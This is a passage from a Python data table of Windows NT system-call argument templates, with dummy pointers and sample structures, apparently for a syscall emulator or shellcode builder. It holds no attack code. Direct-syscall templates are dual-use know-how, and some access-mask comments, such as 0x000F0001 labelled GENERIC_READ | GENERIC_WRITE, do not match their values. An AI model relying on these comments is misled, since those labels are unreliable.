VmPrefetchInformation)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000444", "additionalComment": "HANDLE ProcessHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": { "struct55": { "type": "MEMORY_RANGE_ENTRY", "fields": [ { "fieldName": "VirtualAddress", "fieldType": "PVOID", "fieldValue": "0x00400000", "fieldComment": "Start address of memory range" }, { "fieldName": "NumberOfBytes", "fieldType": "SIZE_T", "fieldValue": "0x00001000", "fieldComment": "Size of memory range (4 KB)" } ] } } }, "NtOpenPrivateNamespace": { "ntFunc": "NtOpenPrivateNamespace", "pushes": [ { "value": "0xbadd0020", "additionalComment": "Pointer to BoundaryDescriptor (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": "BoundaryDescriptor structure or buffer.", "pointedValue": "0x00000000" }, { "value": "0xbadd0030", "additionalComment": "Pointer to OBJECT_ATTRIBUTES (dummy pointer)", "structurePointer": "OBJECT_ATTRIBUTES", "structureRef": "struct56", "structureValueExpectations": "OBJECT_ATTRIBUTES for the namespace object.", "pointedValue": None }, { "value": "0x000F0001", "additionalComment": "ACCESS_MASK DesiredAccess (example: GENERIC_READ | GENERIC_WRITE)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0040", "additionalComment": "Pointer to HANDLE NamespaceHandle (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" } ], "structures": { "struct56": { "type": "OBJECT_ATTRIBUTES", "fields": [ { "fieldName": "Length", "fieldType": "ULONG", "fieldValue": "0x00000030", "fieldComment": "Size of OBJECT_ATTRIBUTES" }, { "fieldName": "RootDirectory", "fieldType": "HANDLE", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "ObjectName", "fieldType": "PUNICODE_STRING", "fieldValue": "0x00000000", "fieldComment": "None (no name)" }, { "fieldName": "Attributes", "fieldType": "ULONG", "fieldValue": "0x00000040", "fieldComment": "OBJ_CASE_INSENSITIVE" }, { "fieldName": "SecurityDescriptor", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "SecurityQualityOfService", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "None" } ] } } }, "NtCreatePrivateNamespace": { "ntFunc": "NtCreatePrivateNamespace", "pushes": [ { "value": "0xbadd0050", "additionalComment": "Pointer to BoundaryDescriptor (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": "BoundaryDescriptor structure or buffer.", "pointedValue": "0x00000000" }, { "value": "0xbadd0060", "additionalComment": "Pointer to OBJECT_ATTRIBUTES (dummy pointer)", "structurePointer": "OBJECT_ATTRIBUTES", "structureRef": "struct57", "structureValueExpectations": "OBJECT_ATTRIBUTES for the namespace object.", "pointedValue": None }, { "value": "0x000F0001", "additionalComment": "ACCESS_MASK DesiredAccess (example: GENERIC_READ | GENERIC_WRITE)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0070", "additionalComment": "Pointer to HANDLE NamespaceHandle (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" } ], "structures": { "struct57": { "type": "OBJECT_ATTRIBUTES", "fields": [ { "fieldName": "Length", "fieldType": "ULONG", "fieldValue": "0x00000030", "fieldComment": "Size of OBJECT_ATTRIBUTES" }, { "fieldName": "RootDirectory", "fieldType": "HANDLE", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "ObjectName", "fieldType": "PUNICODE_STRING", "fieldValue": "0x00000000", "fieldComment": "None (no name)" }, { "fieldName": "Attributes", "fieldType": "ULONG", "fieldValue": "0x00000040", "fieldComment": "OBJ_CASE_INSENSITIVE" }, { "fieldName": "SecurityDescriptor", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "SecurityQualityOfService", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "None" } ] } } }, "NtDeletePrivateNamespace": { "ntFunc": "NtDeletePrivateNamespace", "pushes": [ { "value": "0x0000abcd", "additionalComment": "HANDLE NamespaceHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtReplacePartitionUnit": { "ntFunc": "NtReplacePartitionUnit", "pushes": [ { "value": "0x00000001", "additionalComment": "ULONG Flags (example: 1, e.g. REPLACE_PARTITION_UNIT_FLAG_NONE)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0080", "additionalComment": "Pointer to UNICODE_STRING SpareInstancePath (dummy pointer)", "structurePointer": "UNICODE_STRING", "structureRef": "struct58", "structureValueExpectations": "UNICODE_STRING describing the spare partition instance path.", "pointedValue": None }, { "value": "0xbadd0090", "additionalComment": "Pointer to UNICODE_STRING TargetInstancePath (dummy pointer)", "structurePointer": "UNICODE_STRING", "structureRef": "struct59", "structureValueExpectations": "UNICODE_STRING describing the target partition instance path.", "pointedValue": None } ], "structures": { "struct58": { "type": "UNICODE_STRING", "fields": [ { "fieldName": "Length", "fieldType": "USHORT", "fieldValue": "0x0020", "fieldComment": "Length in bytes (example: 16 UTF-16 chars)" }, { "fieldName": "MaximumLength", "fieldType": "USHORT", "fieldValue": "0x0022", "fieldComment": "Maximum length in bytes" }, { "fieldName": "Buffer", "fieldType": "PWSTR", "fieldValue": "0xbadd00a0", "fieldComment": "Pointer to wide string buffer (dummy pointer)" } ] }, "struct59": { "type": "UNICODE_STRING", "fields": [ { "fieldName": "Length", "fieldType": "USHORT", "fieldValue": "0x0020", "fieldComment": "Length in bytes (example: 16 UTF-16 chars)" }, { "fieldName": "MaximumLength", "fieldType": "USHORT", "fieldValue": "0x0022", "fieldComment": "Maximum length in bytes" }, { "fieldName": "Buffer", "fieldType": "PWSTR", "fieldValue": "0xbadd00b0", "fieldComment": "Pointer to wide string buffer (dummy pointer)" } ] } } }, "NtSerializeBoot": { "ntFunc": "NtSerializeBoot", "pushes": [], "structures": {} }, "NtOpenKeyTransacted": { "ntFunc": "NtOpenKeyTransacted", "pushes": [ { "value": "0x00000000", "additionalComment": "HANDLE TransactionHandle (None, default for no transaction)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "Pointer to OBJECT_ATTRIBUTES (None, default for root key)", "structurePointer": "OBJECT_ATTRIBUTES", "structureRef": None, "structureValueExpectations": "Length/size field; optional root directory handle; optional UNICODE_STRING object name pointer; attribute flags; optional security descriptor pointer; optional security quality of service pointer.", "pointedValue": None }, { "value": "0x00020019", "additionalComment": "DesiredAccess (KEY_READ | KEY_QUERY_VALUE | KEY_ENUMERATE_SUB_KEYS)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0000", "additionalComment": "Pointer to HANDLE KeyHandle (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" } ], "structures": {} }, "NtOpenKeyTransactedEx": { "ntFunc": "NtOpenKeyTransactedEx", "pushes": [ { "value": "0x00000000", "additionalComment": "HANDLE TransactionHandle (None, default for no transaction)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000020", "additionalComment": "OpenOptions (REG_OPTION_OPEN_LINK)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0010", "additionalComment": "Pointer to OBJECT_ATTRIBUTES (dummy pointer)", "structurePointer": "OBJECT_ATTRIBUTES", "structureRef": "struct60", "structureValueExpectations": "Length/size field; optional root directory handle; optional UNICODE_STRING object name pointer; attribute flags; optional security descriptor pointer; optional security quality of service pointer.", "pointedValue": None }, { "value": "0x00020019", "additionalComment": "DesiredAccess (KEY_READ | KEY_QUERY_VALUE | KEY_ENUMERATE_SUB_KEYS)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0020", "additionalComment": "Pointer to HANDLE KeyHandle (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" } ], "structures": { "struct60": { "type": "OBJECT_ATTRIBUTES", "fields": [ { "fieldName": "Length", "fieldType": "ULONG", "fieldValue": "0x00000030", "fieldComment": "Size of OBJECT_ATTRIBUTES" }, { "fieldName": "RootDirectory", "fieldType": "HANDLE", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "ObjectName", "fieldType": "PUNICODE_STRING", "fieldValue": "0xbadd0060", "fieldComment": "Pointer to UNICODE_STRING (dummy pointer)" }, { "fieldName": "Attributes", "fieldType": "ULONG", "fieldValue": "0x00000040", "fieldComment": "OBJ_CASE_INSENSITIVE" }, { "fieldName": "SecurityDescriptor", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "SecurityQualityOfService", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "None" } ] } } }, "NtFreezeRegistry": { "ntFunc": "NtFreezeRegistry", "pushes": [ { "value": "0x0000000A", "additionalComment": "Time_OutInSeconds (10 seconds)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtCreateKeyTransacted": { "ntFunc": "NtCreateKeyTransacted", "pushes": [ { "value": "0xbadd0030", "additionalComment": "Pointer to ULONG (dummy pointer, optional return for disposition)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000001" }, { "value": "0x00000000", "additionalComment": "HANDLE TransactionHandle (None, default for no transaction)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000010", "additionalComment": "CreateOptions (REG_OPTION_NON_VOLATILE)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "Pointer to UNICODE_STRING Class (None, default for no class string)", "structurePointer": "UNICODE_STRING", "structureRef": None, "structureValueExpectations": "Optional class string for the key.", "pointedValue": None }, { "value": "0x00000000", "additionalComment": "Reserved ULONG (must be zero)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0040", "additionalComment": "Pointer to OBJECT_ATTRIBUTES (dummy pointer)", "structurePointer": "OBJECT_ATTRIBUTES", "structureRef": "struct61", "structureValueExpectations": "Length/size field; optional root directory handle; optional UNICODE_STRING object name pointer; attribute flags; optional security descriptor pointer; optional security quality of service pointer.", "pointedValue": None }, { "value": "0x000F003F", "additionalComment": "DesiredAccess (KEY_ALL_ACCESS)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0050", "additionalComment": "Pointer to HANDLE KeyHandle (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" } ], "structures": { "struct61": { "type": "OBJECT_ATTRIBUTES", "fields": [ { "fieldName": "Length", "fieldType": "ULONG", "fieldValue": "0x00000030", "fieldComment": "Size of OBJECT_ATTRIBUTES" }, { "fieldName": "RootDirectory", "fieldType": "HANDLE", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "ObjectName", "fieldType": "PUNICODE_STRING", "fieldValue": "0xbadd0070", "fieldComment": "Pointer to UNICODE_STRING (dummy pointer)" }, { "fieldName": "Attributes", "fieldType": "ULONG", "fieldValue": "0x00000040", "fieldComment": "OBJ_CASE_INSENSITIVE" }, { "fieldName": "SecurityDescriptor", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "SecurityQualityOfService", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "None" } ] } } }, "NtQuerySecurityAttributesToken": { "ntFunc": "NtQuerySecurityAttributesToken", "pushes": [ { "value": "0xbadd0000", "additionalComment": "Pointer to ULONG ReturnLength (dummy pointer, optional, may be None)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000020" }, { "value": "0x00000100", "additionalComment": "ULONG Length (typical buffer size, e.g. 256 bytes)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0010", "additionalComment": "Pointer to output buffer (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0xbadd1000" }, { "value": "0x00000002", "additionalComment": "ULONG NumberOfAttributes (example: 2 attributes)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0020", "additionalComment": "Pointer to UNICODE_STRING Attributes (dummy pointer, optional, may be None)", "structurePointer": "UNICODE_STRING", "structureRef": "struct62", "structureValueExpectations": "UNICODE_STRING describing attribute name(s)", "pointedValue": None }, { "value": "0x00000444", "additionalComment": "HANDLE TokenHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": { "struct62": { "type": "UNICODE_STRING", "fields": [ { "fieldName": "Length", "fieldType": "USHORT", "fieldValue": "0x0010", "fieldComment": "Length in bytes of string" }, { "fieldName": "MaximumLength", "fieldType": "USHORT", "fieldValue": "0x0020", "fieldComment": "Maximum length in bytes" }, { "fieldName": "Buffer", "fieldType": "PWSTR", "fieldValue": "0xbadd0130", "fieldComment": "Pointer to string buffer (dummy pointer)" } ] } } }, "NtWow64CallFunction64": { "ntFunc": "NtWow64CallFunction64", "pushes": [ { "value": "0xbadd0030", "additionalComment": "Optional pointer to ULONG (dummy pointer, may be None)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" }, { "value": "0xbadd0040", "additionalComment": "Pointer to output buffer (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0xbadd2000" }, { "value": "0x00000100", "additionalComment": "ULONG OutputLength (256 bytes typical)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0050", "additionalComment": "Pointer to input buffer (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0xbadd3000" }, { "value": "0x00000020", "additionalComment": "ULONG InputLength (32 bytes typical)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000001", "additionalComment": "ULONG Flags (example: 1)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000005", "additionalComment": "ULONG FunctionIndex (example: 5)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtWow64WriteVirtualMemory64": { "ntFunc": "NtWow64WriteVirtualMemory64", "pushes": [ { "value": "0xbadd0060", "additionalComment": "Optional pointer to ULONGLONG (dummy pointer, may be None)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000010" }, { "value": "0x00001000", "additionalComment": "ULONGLONG BufferSize (4096 bytes typical)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0070", "additionalComment": "Pointer to buffer (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0xbadd4000" }, { "value": "0x00007fff0000", "additionalComment": "PVOID64 BaseAddress (typical 64-bit address)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000444", "additionalComment": "HANDLE ProcessHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtAlpcConnectPortEx": { "ntFunc": "NtAlpcConnectPortEx", "pushes": [ { "value": "0xbadd0080", "additionalComment": "Pointer to LARGE_INTEGER TimeOut (dummy pointer, optional, may be None)", "structurePointer": "LARGE_INTEGER", "structureRef": "struct63", "structureValueExpectations": "Timeout value in 100-nanosecond intervals", "pointedValue": None }, { "value": "0xbadd0090", "additionalComment": "Pointer to ALPC_MESSAGE_ATTRIBUTES InMessageAttributes (dummy pointer, optional, may be None)", "structurePointer": "ALPC_MESSAGE_ATTRIBUTES", "structureRef": "struct64", "structureValueExpectations": "Attributes for the input message", "pointedValue": None }, { "value": "0xbadd00a0", "additionalComment": "Pointer to ALPC_MESSAGE_ATTRIBUTES OutMessageAttributes (dummy pointer, optional, may be None)", "structurePointer": "ALPC_MESSAGE_ATTRIBUTES", "structureRef": "struct65", "structureValueExpectations": "Attributes for the output message", "pointedValue": None }, { "value": "0xbadd00b0", "additionalComment": "Pointer to SIZE_T BufferLength (dummy pointer, optional, may be None)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000200" }, { "value": "0xbadd00c0", "additionalComment": "Pointer to PORT_MESSAGE ConnectionMessage (dummy pointer, optional, may be None)", "structurePointer": "PORT_MESSAGE", "structureRef": "struct66", "structureValueExpectations": "Connection message structure", "pointedValue": None }, { "value": "0xbadd00d0", "additionalComment": "Pointer to SECURITY_DESCRIPTOR ServerSecurityRequirements (dummy pointer, optional, may be None)", "structurePointer": "SECURITY_DESCRIPTOR", "structureRef": "struct67", "structureValueExpectations": "Security descriptor for server requirements", "pointedValue": None }, { "value": "0x00000001", "additionalComment": "ULONG Flags (example: ALPC_CONNECTFLAG_SYNC_CONNECTION)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd00e0", "additionalComment": "Pointer to ALPC_PORT_ATTRIBUTES PortAttributes (dummy pointer, optional, may be None)", "structurePointer": "ALPC_PORT_ATTRIBUTES", "structureRef": "struct68", "structureValueExpectations": "Port attribute structure", "pointedValue": None }, { "value": "0xbadd00f0", "additionalComment": "Pointer to OBJECT_ATTRIBUTES ClientPortObjectAttributes (dummy pointer, optional, may be None)", "structurePointer": "OBJECT_ATTRIBUTES", "structureRef": "struct69", "structureValueExpectations": "Object attributes for client port", "pointedValue": None }, { "value": "0xbadd0100", "additionalComment": "Pointer to OBJECT_ATTRIBUTES ConnectionPortObjectAttributes (dummy pointer, optional, may be None)", "structurePointer": "OBJECT_ATTRIBUTES", "structureRef": "struct70", "structureValueExpectations": "Object attributes for connection port", "pointedValue": None }, { "value": "0xbadd0110", "additionalComment": "Pointer to HANDLE PortHandle (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" } ], "structures": { "struct63": { "type": "LARGE_INTEGER", "fields": [ { "fieldName": "QuadPart", "fieldType": "LONGLONG", "fieldValue": "0x00000001dcd65000", "fieldComment": "Timeout value: 2 seconds in 100-nanosecond intervals" } ] }, "struct64": { "type": "ALPC_MESSAGE_ATTRIBUTES", "fields": [ { "fieldName": "AllocatedAttributes", "fieldType": "ULONG", "fieldValue": "0x00000001", "fieldComment": "Example: ALPC_MESSAGE_SECURITY_ATTRIBUTE" }, { "fieldName": "ValidAttributes", "fieldType": "ULONG", "fieldValue": "0x00000001", "fieldComment": "Example: ALPC_MESSAGE_SECURITY_ATTRIBUTE" } ] }, "struct65": { "type": "ALPC_MESSAGE_ATTRIBUTES", "fields": [ { "fieldName": "AllocatedAttributes", "fieldType": "ULONG", "fieldValue": "0x00000000", "fieldComment": "No attributes allocated" }, { "fieldName": "ValidAttributes", "fieldType": "ULONG", "fieldValue": "0x00000000", "fieldComment": "No attributes valid" } ] }, "struct66": { "type": "PORT_MESSAGE", "fields": [ { "fieldName": "u1.Length", "fieldType": "USHORT", "fieldValue": "0x0040", "fieldComment": "Message length" }, { "fieldName": "u1.ZeroInit", "fieldType": "USHORT", "fieldValue": "0x0000", "fieldComment": "Zero-initialized" }, { "fieldName": "u2.Type", "fieldType": "USHORT", "fieldValue": "0x0001", "fieldComment": "Message type" }, { "fieldName": "u2.DataInfoOffset", "fieldType": "USHORT", "fieldValue": "0x0000", "fieldComment": "No data info" }, { "fieldName": "ClientId.UniqueProcess", "fieldType": "HANDLE", "fieldValue": "0x99995555", "fieldComment": "Dummy process ID" }, { "fieldName": "ClientId.UniqueThread", "fieldType": "HANDLE", "fieldValue": "0x00000000", "fieldComment": "Dummy thread ID" }, { "fieldName": "MessageId", "fieldType": "ULONG", "fieldValue": "0x00000001", "fieldComment": "Message ID" }, { "fieldName": "ClientViewSize", "fieldType": "SIZE_T", "fieldValue": "0x00000000", "fieldComment": "No client view" } ] }, "struct67": { "type": "SECURITY_DESCRIPTOR", "fields": [ { "fieldName": "Revision", "fieldType": "UCHAR", "fieldValue": "0x01", "fieldComment": "Revision 1" }, { "fieldName": "Sbz1", "fieldType": "UCHAR", "fieldValue": "0x00", "fieldComment": "Reserved" }, { "fieldName": "Control", "fieldType": "USHORT", "fieldValue": "0x8004", "fieldComment": "SE_DACL_PRESENT | SE_SELF_RELATIVE" }, { "fieldName": "Owner", "fieldType": "PVOID", "fieldValue": "0xbadd0140", "fieldComment": "Pointer to owner SID (dummy pointer)" }, { "fieldName": "Group", "fieldType": "PVOID", "fieldValue": "0xbadd0150", "fieldComment": "Pointer to group SID (dummy pointer)" }, { "fieldName": "Sacl", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "Dacl", "fieldType": "PVOID", "fieldValue": "0xbadd0160", "fieldComment": "Pointer to DACL (dummy pointer)" } ] }, "struct68": { "type": "ALPC_PORT_ATTRIBUTES", "fields": [ { "fieldName": "Flags", "fieldType": "ULONG", "fieldValue": "0x00000001", "fieldComment": "ALPC_PORTFLG_ALLOW_LPC_REQUESTS" }, { "fieldName": "SecurityQos.Length", "fieldType": "ULONG", "fieldValue": "0x0000000c", "fieldComment": "SECURITY_QUALITY_OF_SERVICE size" }, { "fieldName": "MaxMessageLength", "fieldType": "ULONG", "fieldValue": "0x00001000", "fieldComment": "4096 bytes" }, { "fieldName": "MemoryBandwidth", "fieldType": "ULONG", "fieldValue": "0x00000000", "fieldComment": "Default" }, { "fieldName": "MaxPoolUsage", "fieldType": "ULONG", "fieldValue": "0x00000000", "fieldComment": "Default" }, { "fieldName": "MaxSectionSize", "fieldType": "ULONG", "fieldValue": "0x00000000", "fieldComment": "Default" }, { "fieldName": "MaxViewSize", "fieldType": "ULONG", "fieldValue": "0x00000000", "fieldComment": "Default" }, { "fieldName": "MaxTotalSectionSize", "fieldType": "ULONG", "fieldValue": "0x00000000", "fieldComment": "Default" }, { "fieldName": "DupObjectTypes", "fieldType": "ULONG", "fieldValue": "0x00000000", "fieldComment": "Default" } ] }, "struct69": { "type": "OBJECT_ATTRIBUTES", "fields": [ { "fieldName": "Length", "fieldType": "ULONG", "fieldValue": "0x00000030", "fieldComment": "Size of OBJECT_ATTRIBUTES" }, { "fieldName": "RootDirectory", "fieldType": "HANDLE", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "ObjectName", "fieldType": "PUNICODE_STRING", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "Attributes", "fieldType": "ULONG", "fieldValue": "0x00000040", "fieldComment": "OBJ_CASE_INSENSITIVE" }, { "fieldName": "SecurityDescriptor", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "SecurityQualityOfService", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "None" } ] }, "struct70": { "type": "OBJECT_ATTRIBUTES", "fields": [ { "fieldName": "Length", "fieldType": "ULONG", "fieldValue": "0x00000030", "fieldComment": "Size of OBJECT_ATTRIBUTES" }, { "fieldName": "RootDirectory", "fieldType": "HANDLE", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "ObjectName", "fieldType": "PUNICODE_STRING", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "Attributes", "fieldType": "ULONG", "fieldValue": "0x00000040", "fieldComment": "OBJ_CASE_INSENSITIVE" }, { "fieldName": "SecurityDescriptor", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "SecurityQualityOfService", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "None" } ] } } }, "NtAlpcImpersonateClientContainerOfPort": { "ntFunc": "NtAlpcImpersonateClientContainerOfPort", "pushes": [ { "value": "0x00000000", "additionalComment": "ULONG Flags (default: 0)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0120", "additionalComment": "Pointer to PORT_MESSAGE Message (dummy pointer)", "structurePointer": "PORT_MESSAGE", "structureRef": "struct71", "structureValueExpectations": "Message to impersonate", "pointedValue": None }, { "value": "0x00000444", "additionalComment": "HANDLE PortHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": { "struct71": { "type": "PORT_MESSAGE", "fields": [ { "fieldName": "u1.Length", "fieldType": "USHORT", "fieldValue": "0x0040", "fieldComment": "Message length" }, { "fieldName": "u1.ZeroInit", "fieldType": "USHORT", "fieldValue": "0x0000", "fieldComment": "Zero-initialized" }, { "fieldName": "u2.Type", "fieldType": "USHORT", "fieldValue": "0x0001", "fieldComment": "Message type" }, { "fieldName": "u2.DataInfoOffset", "fieldType": "USHORT", "fieldValue": "0x0000", "fieldComment": "No data info" }, { "fieldName": "ClientId.UniqueProcess", "fieldType": "HANDLE", "fieldValue": "0x99996666", "fieldComment": "Dummy process ID" }, { "fieldName": "ClientId.UniqueThread", "fieldType": "HANDLE", "fieldValue": "0x00000000", "fieldComment": "Dummy thread ID" }, { "fieldName": "MessageId", "fieldType": "ULONG", "fieldValue": "0x00000002", "fieldComment": "Message ID" }, { "fieldName": "ClientViewSize", "fieldType": "SIZE_T", "fieldValue": "0x00000000", "fieldComment": "No client view" } ] } } }, "NtAreMappedFilesTheSame": { "ntFunc": "NtAreMappedFilesTheSame", "pushes": [ { "value": "0x00000000", "additionalComment": "PVOID File2MappedAsFile (None, no file mapped)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "PVOID File1MappedAsAnImage (None, no image mapped)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtAssignProcessToJobObject": { "ntFunc": "NtAssignProcessToJobObject", "pushes": [ { "value": "0x00004444", "additionalComment": "HANDLE ProcessHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00003333", "additionalComment": "HANDLE JobHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtCreateJobSet": { "ntFunc": "NtCreateJobSet", "pushes": [ { "value": "0x00000001", "additionalComment": "ULONG JobSetCount (1 job in set)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0000", "additionalComment": "Pointer to JOB_SET_ARRAY (dummy pointer)", "structurePointer": "JOB_SET_ARRAY", "structureRef": "struct72", "structureValueExpectations": "Array of JOB_SET_ARRAY structures describing jobs to create.", "pointedValue": None }, { "value": "0x00000000", "additionalComment": "ULONG Flags (0, no special flags)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": { "struct72": { "type": "JOB_SET_ARRAY", "fields": [ { "fieldName": "JobHandle", "fieldType": "HANDLE", "fieldValue": "0x00003333", "fieldComment": "Dummy job handle" }, { "fieldName": "MemberLevel", "fieldType": "ULONG", "fieldValue": "0x00000001", "fieldComment": "Member level 1" }, { "fieldName": "Flags", "fieldType": "ULONG", "fieldValue": "0x00000000", "fieldComment": "No special flags" } ] } } }, "NtCreateJobObject": { "ntFunc": "NtCreateJobObject", "pushes": [ { "value": "0xbadd0010", "additionalComment": "Pointer to OBJECT_ATTRIBUTES (dummy pointer)", "structurePointer": "OBJECT_ATTRIBUTES", "structureRef": "struct73", "structureValueExpectations": "Length/size field; optional root directory handle; optional UNICODE_STRING object name pointer; attribute flags; optional security descriptor pointer; optional security quality of service pointer.", "pointedValue": None }, { "value": "0x00020000", "additionalComment": "ACCESS_MASK DesiredAccess (JOB_OBJECT_ALL_ACCESS)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0020", "additionalComment": "Pointer to HANDLE JobHandle (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" } ], "structures": { "struct73": { "type": "OBJECT_ATTRIBUTES", "fields": [ { "fieldName": "Length", "fieldType": "ULONG", "fieldValue": "0x00000030", "fieldComment": "Size of OBJECT_ATTRIBUTES" }, { "fieldName": "RootDirectory", "fieldType": "HANDLE", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "ObjectName", "fieldType": "PUNICODE_STRING", "fieldValue": "0x00000000", "fieldComment": "None (no name)" }, { "fieldName": "Attributes", "fieldType": "ULONG", "fieldValue": "0x00000040", "fieldComment": "OBJ_CASE_INSENSITIVE" }, { "fieldName": "SecurityDescriptor", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "SecurityQualityOfService", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "None" } ] } } }, "NtOpenJobObject": { "ntFunc": "NtOpenJobObject", "pushes": [ { "value": "0xbadd0030", "additionalComment": "Pointer to OBJECT_ATTRIBUTES (dummy pointer)", "structurePointer": "OBJECT_ATTRIBUTES", "structureRef": "struct74", "structureValueExpectations": "Length/size field; optional root directory handle; optional UNICODE_STRING object name pointer; attribute flags; optional security descriptor pointer; optional security quality of service pointer.", "pointedValue": None }, { "value": "0x00020000", "additionalComment": "ACCESS_MASK DesiredAccess (JOB_OBJECT_ALL_ACCESS)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0040", "additionalComment": "Pointer to 